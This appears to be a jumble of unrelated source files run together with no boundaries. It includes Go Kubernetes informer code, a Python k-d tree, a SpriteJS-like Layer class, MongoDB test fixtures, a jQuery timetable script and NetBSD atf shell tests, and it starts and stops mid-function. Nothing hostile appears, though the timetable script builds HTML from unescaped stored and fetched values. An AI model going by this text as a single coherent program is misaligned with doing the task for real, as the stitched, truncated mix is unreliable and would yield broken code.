	// The selfLink of a namespaced object contains "namespaces/<ns>", so a
	// substring match per ignored namespace is sufficient.
	for _, n := range ic.ignoreNamespaces {
		if strings.Contains(selfLink, fmt.Sprintf("namespaces/%s", n)) {
			return true
		}
	}
	return false
}

// startSkipAddEventTimer creates a timer for the duration set in the
// InformerClient's skipAddEventTime attribute. It blocks until the timer has
// finished then sets the allowAddEvent flag to true, signifying that the
// client can now queue add events it receives from the kubernetes API server.
func (ic *InformerClient) startSkipAddEventTimer() {
	t := time.NewTimer(ic.skipAddEventTime)
	// wait for return on timer's channel then set allowAddEvent flag to true
	glog.Infof("add event delay in effect for %s resource watch for %v duration", ic.resource, ic.skipAddEventTime)
	<-t.C
	ic.allowAddEvent = true
	glog.Infof("add event delay ended for %s resource watch", ic.resource)
}

// String pretty prints InformerClients, e.g. "[pods, deployments]".
func (ics InformerClients) String() string {
	o := "["
	for i, ic := range ics {
		o += ic.resource
		if i != len(ics)-1 {
			o += ", "
		}
	}
	o += "]"
	return o
}
class Node:
    """Single node of a k-d tree.

    Attributes:
        point: the point stored at this node (a sequence of coordinates).
        axis: the splitting axis chosen for this node; set by the tree builder.
        left: subtree of points with a smaller coordinate on ``axis``.
        right: subtree of points with a larger-or-equal coordinate on ``axis``.
    """

    def __init__(self, point=None, left=None, right=None):
        self.point = point
        self.axis = None  # filled in by KdTree's builder
        self.left = left
        self.right = right


class KdTree:
    """Balanced k-d tree built by median splits.

    Fixes over the previous version: the ``points=[]`` mutable default is
    gone, the caller's list is no longer sorted in place, and the
    dimensionality is configurable instead of hard-coded to 2.
    """

    def __init__(self, points=None, k=2):
        """Build the tree from an iterable of points.

        Args:
            points: iterable of points (sequences of at least ``k``
                coordinates). May be None or empty, yielding an empty tree.
            k: number of dimensions to cycle through when splitting
                (default 2, matching the original behavior).
        """

        def _build(pts, depth):
            # Recursively split on the median along the cycling axis.
            if not pts:
                return None
            axis = depth % k
            pts = sorted(pts, key=lambda p: p[axis])  # copy; never mutate input
            mid = len(pts) // 2
            node = Node(
                pts[mid],
                _build(pts[:mid], depth + 1),
                _build(pts[mid + 1:], depth + 1),
            )
            node.axis = axis
            return node

        self.root = _build(list(points) if points else [], 0)
/**
 * Convert an integer (or numeric string) to a floating-point number.
 *
 * @param {number|string} int - value to convert.
 * @returns {number} the parsed float, or NaN when unparsable.
 */
function intToFloat(int) {
  const asFloat = Number.parseFloat(int);
  return asFloat;
}
package suidata3 import ( "net/http" "github.com/codemodus/swagui/internal/assets" "github.com/codemodus/swagui/internal/suihttp" ) // SUIData3 represents Swagger-UI v3 resources. type SUIData3 struct { as *assets.Assets index string def string } // New sets up a new SUIData3. func New() *SUIData3 { aliases := map[string]string{} return &SUIData3{ as: assets.New(Asset, aliases), index: "index.html", def: "https://petstore.swagger.io/v2/swagger.json", } } // Handler returns an http.Handler which serves Swagger-UI. func (d *SUIData3) Handler(notFound http.Handler, defaultDef string) http.Handler { return suihttp.Handler(d.as, notFound, d.index, d.def, defaultDef) }
#!/bin/bash
# Launch CandyAntivirus.pl with PERL5LIB pointing at the project's lib/ dir.
#
# If invoked from a subdirectory, step up one level so the script and its
# lib/ directory can be found. `cd` is checked so a failure cannot leave us
# running perl from the wrong directory (ShellCheck SC2164).
if [ ! -f "CandyAntivirus.pl" ]; then
    cd .. || exit 1
fi

# Fail early with a clear message if the entry script still is not here.
if [ ! -f "CandyAntivirus.pl" ]; then
    echo "CandyAntivirus.pl not found" >&2
    exit 1
fi

# $(...) instead of deprecated backticks; quote the path in case it has spaces.
default_dir=$(pwd)
export PERL5LIB="$default_dir/lib"
perl CandyAntivirus.pl
import {Renderer, ENV, Figure2D, Mesh2D} from '@mesh.js/core';
import {Timeline} from 'sprite-animator';
import {mat2d} from 'gl-matrix';
import {requestAnimationFrame, cancelAnimationFrame} from '../utils/animation-frame';
import Group from './group';
import ownerDocument from '../document';
import {deleteTexture} from '../utils/texture';

const defaultOptions = {
  antialias: true,
  autoRender: true,
  alpha: true, // for wx-miniprogram
};

const _autoRender = Symbol('autoRender');
const _renderer = Symbol('renderer');
const _timeline = Symbol('timeline');
const _prepareRender = Symbol('prepareRender');
const _tickRender = Symbol('tickRender');
const _pass = Symbol('pass');
const _fbo = Symbol('fbo');
const _tickers = Symbol('tickers');
const _layerTransformInvert = Symbol('layerTransformInvert');

/**
 * Layer owns a canvas + renderer pair, schedules rendering through
 * requestAnimationFrame, and maps pointer coordinates through the layer's
 * transform.
 *
 * Review fixes in this revision (behavior otherwise unchanged):
 * - `mat2d` is a gl-matrix namespace, not a constructor — calling it threw;
 *   `mat2d.create()` is used instead.
 * - gl-matrix `invert(out, a)` requires an out matrix; the single-argument
 *   call would have thrown at runtime.
 * - `toGlobalPos`/`toLocalPos` computed `y` from the already-transformed `x`.
 */
export default class Layer extends Group {
  constructor(options = {}) {
    super();
    if(!options.canvas) {
      // No canvas supplied: create one sized to the current resolution.
      const {width, height} = this.getResolution();
      const canvas = ENV.createCanvas(width, height, {
        offscreen: !!options.offscreen,
        id: options.id,
        extra: options.extra,
      });
      if(canvas.style) canvas.style.position = 'absolute';
      if(canvas.dataset) canvas.dataset.layerId = options.id;
      if(canvas.contextType) options.contextType = canvas.contextType;
      options.canvas = canvas;
    }
    const canvas = options.canvas;
    const opts = Object.assign({}, defaultOptions, options);
    this[_autoRender] = opts.autoRender;
    delete options.autoRender;
    const _Renderer = opts.Renderer || Renderer;
    this[_renderer] = new _Renderer(canvas, opts);
    // if(canvas.__gl__) {
    //   // fix blendFunc for node-canvas-webgl
    //   const gl = canvas.__gl__;
    //   gl.blendFunc(gl.ONE, gl.ONE_MINUS_SRC_ALPHA);
    // }
    this.options = options;
    this.id = options.id;
    this[_pass] = [];
    this.setResolution(canvas);
    this.canvas = canvas;
    this[_timeline] = new Timeline();
    this.__mouseCapturedTarget = null;
    this[_layerTransformInvert] = null;
  }

  get autoRender() {
    return this[_autoRender];
  }

  get displayRatio() {
    if(this.parent && this.parent.options) {
      return this.parent.options.displayRatio;
    }
    return 1.0;
  }

  get height() {
    const {height} = this.getResolution();
    return height / this.displayRatio;
  }

  get gl() {
    if(this.renderer.glRenderer) {
      return this.renderer.glRenderer.gl;
    }
    return null;
  }

  /* override */
  get layer() {
    return this;
  }

  get offscreen() {
    return !!this.options.offscreen || this.canvas._offscreen;
  }

  get pass() {
    return this[_pass];
  }

  get prepareRender() {
    return this[_prepareRender] ? this[_prepareRender] : Promise.resolve();
  }

  /* override */
  get renderer() {
    return this[_renderer];
  }

  get renderOffset() {
    if(this.parent && this.parent.options) {
      const {left, top} = this.parent.options;
      return [left, top];
    }
    return [this.options.left | 0, this.options.top | 0];
  }

  get timeline() {
    return this[_timeline];
  }

  get width() {
    const {width} = this.getResolution();
    return width / this.displayRatio;
  }

  get localMatrix() {
    const {x, y} = this.attributes;
    return [1, 0, 0, 1, x, y];
  }

  // Cached inverse of the layer's transform; null when the transform is the
  // identity (so callers can skip the mapping entirely).
  get layerTransformInvert() {
    if(this[_layerTransformInvert]) return this[_layerTransformInvert];
    const m = this.transformMatrix;
    if(m[0] === 1 && m[1] === 0 && m[2] === 0 && m[3] === 1 && m[4] === 0 && m[5] === 0) {
      return null;
    }
    // FIX: gl-matrix invert(out, a) takes an out matrix; the previous
    // single-argument call `mat2d.invert(m)` threw at runtime.
    this[_layerTransformInvert] = mat2d.invert(mat2d.create(), m);
    return this[_layerTransformInvert];
  }

  forceContextLoss() {
    const gl = this.renderer.glRenderer;
    if(gl) {
      const ext = gl.getExtension('WEBGL_lose_context');
      if(ext) {
        ext.loseContext();
        return true;
      }
    }
    return false;
  }

  // isPointCollision(x, y) {
  //   return true;
  // }

  // Append a post-processing pass (full-layer quad with a custom program).
  addPass({vertex, fragment, options, uniforms} = {}) {
    if(this.renderer.glRenderer) {
      const {width, height} = this.getResolution();
      const program = this.renderer.createPassProgram({vertex, fragment, options});
      const figure = new Figure2D();
      figure.rect(0, 0, width / this.displayRatio, height / this.displayRatio);
      const mesh = new Mesh2D(figure);
      mesh.setUniforms(uniforms);
      mesh.setProgram(program);
      this[_pass].push(mesh);
      this.forceUpdate();
      return mesh;
    }
    return null;
  }

  // delete unused texture to release memory.
  deleteTexture(image) {
    return deleteTexture(image, this.renderer);
  }

  /* override */
  dispatchPointerEvent(event) {
    const type = event.type;
    if(type === 'mousedown' || type === 'mouseup' || type === 'mousemove') {
      const capturedTarget = this.__mouseCapturedTarget;
      if(capturedTarget) {
        if(capturedTarget.layer === this) {
          capturedTarget.dispatchEvent(event);
          return true;
        }
        this.__mouseCapturedTarget = null;
      }
    }
    // When the layer is transformed, temporarily rewrite the event's
    // coordinates into layer space, dispatch, then restore them.
    let x, y;
    const layerTransformInvert = this.layerTransformInvert;
    if(layerTransformInvert) {
      x = event.x;
      y = event.y;
      const m = layerTransformInvert;
      const layerX = m[0] * x + m[2] * y + m[4];
      const layerY = m[1] * x + m[3] * y + m[5];
      delete event.x;
      delete event.y;
      delete event.layerX;
      delete event.layerY;
      Object.defineProperties(event, {
        layerX: {
          value: layerX,
          configurable: true,
        },
        layerY: {
          value: layerY,
          configurable: true,
        },
        x: {
          value: layerX,
          configurable: true,
        },
        y: {
          value: layerY,
          configurable: true,
        },
      });
    }
    const ret = super.dispatchPointerEvent(event);
    if(layerTransformInvert) {
      Object.defineProperties(event, {
        layerX: {
          value: x,
          configurable: true,
        },
        layerY: {
          value: y,
          configurable: true,
        },
        x: {
          value: x,
          configurable: true,
        },
        y: {
          value: y,
          configurable: true,
        },
      });
    }
    return ret;
  }

  /* override */
  forceUpdate() {
    if(!this[_prepareRender]) {
      if(this.parent && this.parent.hasOffscreenCanvas) {
        // Parent composites this layer; let it drive the render.
        this.parent.forceUpdate();
        let _resolve = null;
        const prepareRender = new Promise((resolve) => {
          _resolve = resolve;
        });
        prepareRender._resolve = _resolve;
        this[_prepareRender] = prepareRender;
      } else {
        let _resolve = null;
        let _requestID = null;
        const prepareRender = new Promise((resolve) => {
          _resolve = resolve;
          if(this[_autoRender]) {
            _requestID = requestAnimationFrame(() => {
              delete prepareRender._requestID;
              this.render();
            });
          }
        });
        prepareRender._resolve = _resolve;
        prepareRender._requestID = _requestID;
        this[_prepareRender] = prepareRender;
      }
    }
  }

  // Lazily (re)create the double-buffered FBO pair used by post-processing
  // passes; recreated whenever the resolution changes.
  getFBO() {
    const renderer = this.renderer.glRenderer;
    const {width, height} = this.getResolution();
    if(renderer && (!this[_fbo] || this[_fbo].width !== width || this[_fbo].height !== height)) {
      this[_fbo] = {
        width,
        height,
        target: renderer.createFBO(),
        buffer: renderer.createFBO(),
        swap() {
          [this.target, this.buffer] = [this.buffer, this.target];
        },
      };
      return this[_fbo];
    }
    return this[_fbo] ? this[_fbo] : null;
  }

  updateGlobalTransform() {
    if(this.layerTransformInvert) {
      const renderer = this.renderer;
      const globalMatrix = renderer.__globalTransformMatrix || renderer.globalTransformMatrix;
      renderer.__globalTransformMatrix = globalMatrix;
      // FIX: mat2d is a gl-matrix namespace object, not callable —
      // `mat2d(1, 0, 0, 1, 0, 0)` threw a TypeError. create() yields the
      // same identity matrix, and multiply() overwrites it anyway.
      const mOut = mat2d.create();
      renderer.setGlobalTransform(...mat2d.multiply(mOut, globalMatrix, this.transformMatrix));
    }
  }

  /* override */
  onPropertyChange(key, newValue, oldValue) {
    super.onPropertyChange(key, newValue, oldValue);
    if(key === 'zIndex') {
      this.canvas.style.zIndex = newValue;
    }
    if(key === 'transform' || key === 'translate' || key === 'rotate' || key === 'scale' || key === 'skew') {
      const m = this[_layerTransformInvert];
      this[_layerTransformInvert] = null;
      this.updateGlobalTransform();
      if(m && !this.layerTransformInvert) {
        // unit matrix, recover globalMatrix
        const renderer = this.renderer;
        const globalMatrix = renderer.__globalTransformMatrix || renderer.globalTransformMatrix;
        renderer.setGlobalTransform(...globalMatrix);
      }
    }
  }

  // Resolve and clear the pending prepareRender promise (cancelling any
  // scheduled animation frame).
  _prepareRenderFinished() {
    if(this[_prepareRender]) {
      if(this[_prepareRender]._requestID) {
        cancelAnimationFrame(this[_prepareRender]._requestID);
      }
      this[_prepareRender]._resolve();
      delete this[_prepareRender];
    }
  }

  render({clear = true} = {}) {
    // With passes present, draw into an FBO and ping-pong through the pass
    // chain; otherwise draw straight to the canvas.
    const fbo = this[_pass].length ? this.getFBO() : null;
    if(fbo) {
      this.renderer.glRenderer.bindFBO(fbo.target);
    }
    if(clear) this[_renderer].clear();
    const meshes = this.draw();
    if(meshes && meshes.length) {
      this.renderer.drawMeshes(meshes);
      if(this.canvas.draw) this.canvas.draw();
    }
    if(fbo) {
      const renderer = this.renderer.glRenderer;
      const len = this[_pass].length;
      const {width, height} = this.getResolution();
      const rect = [0, 0, width / this.displayRatio, height / this.displayRatio];
      this[_pass].forEach((pass, idx) => {
        pass.blend = true;
        pass.setTexture(fbo.target.texture, {rect});
        if(idx === len - 1) renderer.bindFBO(null); // last pass goes to screen
        else {
          fbo.swap();
          renderer.bindFBO(fbo.target);
        }
        this[_renderer].clear();
        this.renderer.drawMeshes([pass]);
      });
    }
    this._prepareRenderFinished();
  }

  /* override */
  setResolution({width, height}) {
    const renderer = this.renderer;
    const m = renderer.__globalTransformMatrix || renderer.globalTransformMatrix;
    const offsetLeft = m[4];
    const offsetTop = m[5];
    const previousDisplayRatio = m[0];
    const {width: w, height: h} = this.getResolution();
    if(w !== width || h !== height) {
      super.setResolution({width, height});
      if(this.canvas) {
        this.canvas.width = width;
        this.canvas.height = height;
        if(renderer.updateResolution) renderer.updateResolution();
      }
      this.attributes.size = [width, height];
      if(this[_pass].length) {
        // Resize each post-processing pass's full-layer quad.
        this[_pass].forEach((pass) => {
          const figure = new Figure2D();
          figure.rect(0, 0, width / this.displayRatio, height / this.displayRatio);
          pass.contours = figure.contours;
        });
      }
      // this.dispatchEvent({type: 'resolutionchange', width, height});
    }
    const [left, top] = this.renderOffset;
    const displayRatio = this.displayRatio;
    if(offsetLeft !== left || offsetTop !== top || previousDisplayRatio !== displayRatio) {
      // console.log(displayRatio, this.parent);
      renderer.setGlobalTransform(displayRatio, 0, 0, displayRatio, left, top);
      renderer.__globalTransformMatrix = null;
      this[_layerTransformInvert] = null;
      this.updateGlobalTransform();
      this.forceUpdate();
    }
  }

  /**
   * tick(handler, {originTime = 0, playbackRate = 1.0, duration = Infinity})
   * @param {*} handler
   * @param {*} options
   */
  tick(handler = null, {duration = Infinity, ...timelineOptions} = {}) {
    // this._prepareRenderFinished();
    const t = this.timeline.fork(timelineOptions);
    const layer = this;
    this[_tickers] = this[_tickers] || [];
    this[_tickers].push({handler, duration});
    const update = () => {
      let _resolve = null;
      let _requestID = null;
      const _update = () => {
        // Run every registered ticker; a handler returning false or reaching
        // p >= 1.0 is removed after the next render.
        const ret = this[_tickers].map(({handler, duration}) => {
          const p = Math.min(1.0, t.currentTime / duration);
          const value = handler ? handler(t.currentTime, p) : null;
          return {value, p};
        });
        if(layer[_autoRender] && !layer[_tickRender]) {
          layer[_tickRender] = Promise.resolve().then(() => {
            layer.render();
            delete layer[_tickRender];
            for(let i = ret.length - 1; i >= 0; i--) {
              const {value, p} = ret[i];
              if(value === false || p >= 1.0) {
                this[_tickers].splice(i, 1);
              }
            }
            if(this[_tickers].length > 0) {
              update();
            }
          });
        }
      };
      // A non-ticker prepareRender (plain forceUpdate) is superseded by the
      // ticker-driven frame.
      if(this[_prepareRender] && this[_prepareRender]._type !== 'ticker') {
        cancelAnimationFrame(this[_prepareRender]._requestID);
        delete this[_prepareRender];
      }
      if(!this[_prepareRender]) {
        const prepareRender = new Promise((resolve) => {
          _resolve = resolve;
          _requestID = requestAnimationFrame(_update);
        });
        prepareRender._resolve = _resolve;
        prepareRender._requestID = _requestID;
        prepareRender._type = 'ticker';
        this[_prepareRender] = prepareRender;
      }
    };
    update();
  }

  // Map layer-local coordinates to global (client) coordinates.
  toGlobalPos(x, y) {
    if(this.layerTransformInvert) {
      const m = this.transformMatrix;
      // FIX: compute both outputs from the ORIGINAL x/y; the previous code
      // fed the already-transformed x into the y equation.
      const x0 = x;
      const y0 = y;
      x = m[0] * x0 + m[2] * y0 + m[4];
      y = m[1] * x0 + m[3] * y0 + m[5];
    }
    const {width, height} = this.getResolution();
    const offset = this.renderOffset;
    const viewport = [this.canvas.clientWidth, this.canvas.clientHeight];
    x = x * viewport[0] / width + offset[0];
    y = y * viewport[1] / height + offset[1];
    const displayRatio = this.displayRatio;
    x *= displayRatio;
    y *= displayRatio;
    return [x, y];
  }

  // Map global (client) coordinates to layer-local coordinates.
  toLocalPos(x, y) {
    const {width, height} = this.getResolution();
    const offset = this.renderOffset;
    const viewport = [this.canvas.clientWidth, this.canvas.clientHeight];
    x = x * width / viewport[0] - offset[0];
    y = y * height / viewport[1] - offset[1];
    const displayRatio = this.displayRatio;
    x /= displayRatio;
    y /= displayRatio;
    const m = this.layerTransformInvert;
    if(m) {
      // FIX: same original-x bug as toGlobalPos.
      const x0 = x;
      const y0 = y;
      x = m[0] * x0 + m[2] * y0 + m[4];
      y = m[1] * x0 + m[3] * y0 + m[5];
    }
    return [x, y];
  }
}

ownerDocument.registerNode(Layer, 'layer');
import { ObjectId } from 'mongodb'; import { UserDocument } from '../models/User'; const userOne: Required<UserDocument> = { _id: new ObjectId('aaaaaaaaaaaaaaaaaaaaaaaa'), uuid: 'aa9696ee-4bf3-4aa0-b38e-f5fdc540a4a0', createdAt: new Date('2021-11-16 18:32:45.110Z'), updatedAt: new Date('2021-11-16 18:32:45.110Z'), bucketId: '---', }; const userTwo: Required<UserDocument> = { _id: new ObjectId('aaaaaaaaaaaaaaaaaaaaaaab'), uuid: '2148255a-289e-425b-a29d-6e4b0c2dc2bb', createdAt: new Date('2021-11-16 18:32:45.110Z'), updatedAt: new Date('2021-11-16 18:32:45.110Z'), bucketId: '---' }; export const users: Required<UserDocument>[] = [userOne, userTwo];
// js/my-courses.js

/**
 * Renders a "Now" banner in .content-header for every saved course whose
 * period matches the class period about to start (or in progress).
 * Courses are read from localStorage key "UserCourses".
 */
function noticeMyCourses() {
    let UserCourses = localStorage.getItem("UserCourses");
    if (UserCourses) {
        UserCourses = JSON.parse(UserCourses);
        const date = new Date();
        const hour = date.getHours();
        const min = date.getMinutes();
        const day = date.getDay();
        // Map wall-clock time to the upcoming class period "1".."6".
        // && binds tighter than ||, so e.g. the first branch means
        // (8:51-8:59) or (9:xx) or (10:00-10:30).
        let next_period = "";
        if (hour == 8 && 50 < min || hour == 9 || hour == 10 && min <= 30) {
            next_period = "1";
        } else if (hour == 10 && 30 < min || hour == 11 || hour == 12 && min <= 10) {
            next_period = "2";
        } else if (hour == 12 && 50 < min || hour == 13 || hour == 14 && min <= 30) {
            next_period = "3";
        } else if (hour == 14 && 35 < min || hour == 15 || hour == 16 && min <= 15) {
            next_period = "4";
        } else if (hour == 16 && 20 < min || hour == 17 || hour == 18 && min == 0) {
            next_period = "5";
        } else if (hour == 18 && 5 < min || hour == 19 && min <= 45) {
            next_period = "6";
        }
        // Saved courses are keyed by "<Day><Period>", e.g. "Mon3".
        const next_flag = ["Sun", "Mon", "Tue", "Wed", "Thu", "Fri", "Sat"][day] + next_period;
        let i = 0;
        while (i < UserCourses.length) {
            if (UserCourses[i]["period"] === next_flag) {
                let name = "(Course name not found)";
                if (UserCourses[i]["name"]) {
                    name = UserCourses[i]["name"];
                }
                let teacher = "(Teacher name not found)";
                if (UserCourses[i]["teacher"]) {
                    teacher = UserCourses[i]["teacher"];
                }
                const time = ["09:00~10:30", "10:40~12:10", "13:00~14:30", "14:45~16:15", "16:30~18:00", "18:15~19:45"][next_period - 1];
                let classroom = "(Classroom not found)";
                if (UserCourses[i]["classroom"]) {
                    classroom = UserCourses[i]["classroom"];
                }
                let url = "#";
                if (UserCourses[i]["url"]) {
                    url = UserCourses[i]["url"];
                }
                const html = '<div class="well my-course bg-primary" style="background-color:#3c8dbc;border-color:#367fa9;margin-top: 30px;"><div class="media">' +
                    '<div class="media-body media-middle"><p><i class="fa fa-angle-double-right"></i> Now</p>' +
                    '<h4 class="media-heading">' + name + '</h4>' +
                    '<i class="fa fa-graduation-cap"></i> ' + teacher + ' <i class="fa fa-clock-o"></i> ' + time + ' <i class="fa fa-map-marker"></i> ' + classroom + ' <i class="fa fa-link"></i> <a href="' + url + '" target="_blank" class="my-course" style="color:#fff;">' + url + '</a>' +
                    '</div></div></div>';
                $(html).appendTo(".content-header");
            }
            i = (i + 1) | 0;
        }
    }
}

/**
 * Renders the weekly timetable for the given academic year, fills it from
 * localStorage, and wires cell clicks to syllabus lookups via the API.
 *
 * @param {string|number} year academic year used in API queries and syllabus URLs
 */
function showMyCourses(year) {
    $(".content-header").html('<h1>List of My Courses</h1><ol class="breadcrumb"><li><i class="fa fa-dashboard"></i> ' + year + '</li><li class="active">My Courses</li></ol>');
    // Build the empty 6x6 (period x weekday) timetable grid.
    let html = '<div class="panel pad-form"><table class="table table-bordered" style="table-layout:fixed;height:10px;">';
    html += '<thead><tr><th style="width:55px;">#</th><th class="text-center">Mon</th><th class="text-center">Tue</th><th class="text-center">Wed</th><th class="text-center">Thu</th><th class="text-center">Fri</th><th class="text-center">Sat</th></tr></thead>';
    html += '<tbody>';
    const time_list = ["09:00~10:30", "10:40~12:10", "13:00~14:30", "14:45~16:15", "16:30~18:00", "18:15~19:45"];
    const day_list = ["Mon", "Tue", "Wed", "Thu", "Fri", "Sat"];
    let n = 0;
    while (n < 6) {
        html += '<tr><th scope="row"><p class="text-primary">' + (n + 1) + '</p>' + time_list[n] + '</th>';
        let i = 0;
        while (i < 6) {
            // Each cell gets id "<Day><Period>" so courses can be slotted by key.
            html += '<td><a id="' + day_list[i] + (n + 1) + '" class="list-group-item my-courses" style="height:100%;cursor:pointer;"></a></td>';
            i = (i + 1) | 0;
        }
        html += '</tr>';
        n = (n + 1) | 0;
    }
    html += '</tbody>';
    html += '</table></div>';
    $(".content").html(html);
    // Fill the grid from the saved courses.
    let UserCourses = localStorage.getItem("UserCourses");
    if (UserCourses) {
        UserCourses = JSON.parse(UserCourses);
        let i = 0;
        while (i < UserCourses.length) {
            let name = "(Course name not found)";
            if (UserCourses[i]["name"]) {
                name = UserCourses[i]["name"];
            }
            let teacher = "(Teacher name not found)";
            if (UserCourses[i]["teacher"]) {
                teacher = UserCourses[i]["teacher"];
            }
            const period = UserCourses[i]["period"];
            let classroom = "(Classroom not found)";
            if (UserCourses[i]["classroom"]) {
                classroom = UserCourses[i]["classroom"];
            }
            // NOTE: the saved "url" field is not shown in the grid cells, so it
            // is intentionally not read here (the unused local was removed).
            const cellHtml = '<h4 class="text-primary course-name">' + name + '</h4>' + '<ul style="list-style:none;padding-left:0;">' + '<li><i class="fa fa-graduation-cap" style="margin-right:1.5px;"></i>' + teacher + '</li>' + '<li><i class="fa fa-map-marker" style="margin-left:5px;margin-right:6px;"></i>' + classroom + '</li>' + '</ul>';
            $("#" + period).html(cellHtml);
            i = (i + 1) | 0;
        }
    }
    $("a.my-courses").on('click', function () {
        if ($(this).children(".course-name").length == 1) {
            // Cell already holds a course: look it up by title and open its syllabus.
            $.getJSON(
                "https://api.tera-chan.com/api/v0.php/terachan:INIADSyllabus?terachan:courseYear=" + year + "&terachan:courseTitle.ja=" + $(this).children(".course-name").text(),
                function (json) {
                    if (json.length === 1) {
                        showModal(json[0]["terachan:courseWeek"] + json[0]["terachan:coursePeriod"], '<iframe src="' + "https://g-sys.toyo.ac.jp/syllabus/html/gakugai/" + year + "/" + year + "_" + json[0]["terachan:syllabusNo"]["ja"] + ".html" + '" style="width:100%;height:100%;border:0;"></iframe>');
                    } else {
                        alert("この科目の詳細なシラバスは提供されていません。\nDetailed syllabuses for this course are not available.");
                    }
                })
        } else {
            // Empty cell: list every course offered in this day/period slot.
            const id = $(this).attr("id");
            $.getJSON(
                "https://api.tera-chan.com/api/v0.php/terachan:INIADSyllabus?terachan:courseYear=" + year + "&terachan:courseWeek=" + id.slice(0, 3) + "&terachan:coursePeriod=" + id.slice(-1),
                function (json) {
                    let html = '<p>開講されている科目はありません。<br>There are no courses offered.</p>';
                    if (json.length > 0) {
                        html = '<p>' + json.length + '科目が開講されています。クリックすると詳細なシラバスを確認できます。<br>';
                        html += json.length + ' courses are offered in this period. Click each course to see the detailed syllabus.</p>';
                        html += '<div class="list-group">';
                        let i = 0;
                        while (i < json.length) {
                            // Prefer the Japanese syllabus number; fall back to English,
                            // then to an alert explaining no syllabus exists.
                            let syllabus_url = "javascript:alert(\'この科目の詳細なシラバスは提供されていません。\nDetailed syllabuses for this course are not available.\');";
                            if (json[i]["terachan:syllabusNo"]["en"]) {
                                syllabus_url = "https://g-sys.toyo.ac.jp/syllabus/html/gakugai/" + json[i]["terachan:courseYear"] + "/" + json[i]["terachan:courseYear"] + "_" + json[i]["terachan:syllabusNo"]["en"] + ".html";
                            }
                            if (json[i]["terachan:syllabusNo"]["ja"]) {
                                syllabus_url = "https://g-sys.toyo.ac.jp/syllabus/html/gakugai/" + json[i]["terachan:courseYear"] + "/" + json[i]["terachan:courseYear"] + "_" + json[i]["terachan:syllabusNo"]["ja"] + ".html";
                            }
                            const semester = json[i]["terachan:courseSemester"];
                            const title = json[i]["terachan:courseTitle"]["ja"];
                            let instructor_name = json[i]["terachan:instructorName"];
                            if (instructor_name.length > 1) {
                                instructor_name = instructor_name[0]["ja"] + " 他";
                            } else {
                                instructor_name = instructor_name[0]["ja"];
                            }
                            let study_year = json[i]["terachan:courseStudyYear"];
                            study_year = study_year[0] + "~" + study_year[study_year.length - 1];
                            const language = { "Japanese": "日本語", "English": "English", "Other Languages": "Other Languages", "Foreign Language Course": "言語科目" }[json[i]["terachan:courseLanguage"]];
                            // BUGFIX: the instructor entry was missing its opening <li>,
                            // and the <a class="list-group-item"> was never closed.
                            html += '<a class="list-group-item" href="' + syllabus_url + '" target="_blank"><h4 class="text-primary">' + title + '</h4>' +
                                '<ul class="list-inline">' +
                                '<li><i class="fa fa-calendar" style="margin-right:3px;"></i>' + semester + '</li>' +
                                '<li><i class="fa fa-graduation-cap" style="margin-right:1.5px;"></i>' + instructor_name + '</li>' +
                                '<li><i class="fa fa-user-circle" style="margin-right:3px;"></i>' + study_year + '</li>' +
                                '<li><i class="fa fa-language" style="margin-right:3px;"></i>' + language + '</li>' +
                                '</ul></a>';
                            i = (i + 1) | 0;
                        }
                        html += '</div>';
                    }
                    showModal(id, html);
                })
        }
    });
}
# # Automated Testing Framework (atf) # # Copyright (c) 2007 The NetBSD Foundation, Inc. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions # are met: # 1. Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # 2. Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # # THIS SOFTWARE IS PROVIDED BY THE NETBSD FOUNDATION, INC. AND # CONTRIBUTORS ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, # INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF # MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. # IN NO EVENT SHALL THE FOUNDATION OR CONTRIBUTORS BE LIABLE FOR ANY # DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE # GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER # IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR # OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN # IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # # TODO: Bring in the checks in the bootstrap testsuite for atf_check. 
# Checks that atf_check reports what it is about to execute, on success
# as well as on (expected) failure.
atf_test_case info_ok
info_ok_head()
{
    atf_set "descr" "Verifies that atf_check prints an informative" \
                    "message even when the command is successful"
}
info_ok_body()
{
    h="$(atf_get_srcdir)/misc_helpers -s $(atf_get_srcdir)"

    atf_check -s eq:0 -o save:stdout -e save:stderr -x \
        "${h} atf_check_info_ok"
    grep 'Executing command.*true' stdout >/dev/null || \
        atf_fail "atf_check does not print an informative message"

    atf_check -s eq:0 -o save:stdout -e save:stderr -x \
        "${h} atf_check_info_fail"
    grep 'Executing command.*false' stdout >/dev/null || \
        atf_fail "atf_check does not print an informative message"
}

# Checks the unified diff printed when stdout differs from the golden file;
# the stderr header must NOT appear since only stdout mismatched.
atf_test_case expout_mismatch
expout_mismatch_head()
{
    atf_set "descr" "Verifies that atf_check prints a diff of the" \
                    "stdout and the expected stdout of the two do not" \
                    "match"
}
expout_mismatch_body()
{
    h="$(atf_get_srcdir)/misc_helpers -s $(atf_get_srcdir)"

    atf_check -s eq:1 -o save:stdout -e save:stderr -x \
        "${h} atf_check_expout_mismatch"
    grep 'Executing command.*echo bar' stdout >/dev/null || \
        atf_fail "atf_check does not print an informative message"
    grep 'stdout does not match golden output' stderr >/dev/null || \
        atf_fail "atf_check does not print the stdout header"
    grep 'stderr' stderr >/dev/null && \
        atf_fail "atf_check prints the stderr header"
    grep '^-foo' stderr >/dev/null || \
        atf_fail "atf_check does not print the stdout's diff"
    grep '^+bar' stderr >/dev/null || \
        atf_fail "atf_check does not print the stdout's diff"
}

# Mirror image of expout_mismatch for the stderr stream.
atf_test_case experr_mismatch
experr_mismatch_head()
{
    atf_set "descr" "Verifies that atf_check prints a diff of the" \
                    "stderr and the expected stderr of the two do not" \
                    "match"
}
experr_mismatch_body()
{
